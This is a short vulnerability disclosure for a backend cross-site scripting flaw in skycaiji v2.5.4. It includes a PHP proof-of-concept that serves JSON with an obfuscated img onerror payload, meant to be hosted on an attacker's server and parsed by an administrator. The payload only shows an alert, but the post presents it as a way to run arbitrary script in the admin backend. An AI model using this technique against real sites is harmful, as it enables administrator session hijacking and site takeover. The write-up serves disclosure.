0%

skycaiji-v2.5.4 has a backend xss vulnerability

skycaiji-v2.5.4 has a backend xss vulnerability

Firstly, you can download the source code from the following website

https://down.chinaz.com/api/index/download?id=38972&type=code

Directly place it in the root directory of the website, access the server IP, and follow the prompts to install

After installation, log in to the backend.

image-20230502232501330

Click to the above function point

This is a JSON parsing function, but there is no complete xss protection in place.

We can construct a file that returns the JSON format ourselves, then access it, and return it to the JSON format with xss to trigger the xss code in the background.

1
2
3
4
5
6
7
8
9
10
11
<?php
$data = array(
'name' => 'John <img src=\'x\' onerror=\"eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))\">',
'age' => 30,
'email' => 'johndoe@example.com',
);

$json = json_encode($data);

header('Content-type: application/json');
echo $json;

This string of code will return a JSON data with malicious payload.

We will deploy it on our own VPS and induce the backend administrator to parse its data, and we will find that the successful triggering of the xss code

image-20230502232849580

image-20230502232855722

Attackers can use this vulnerability to do anything that JavaScript code can do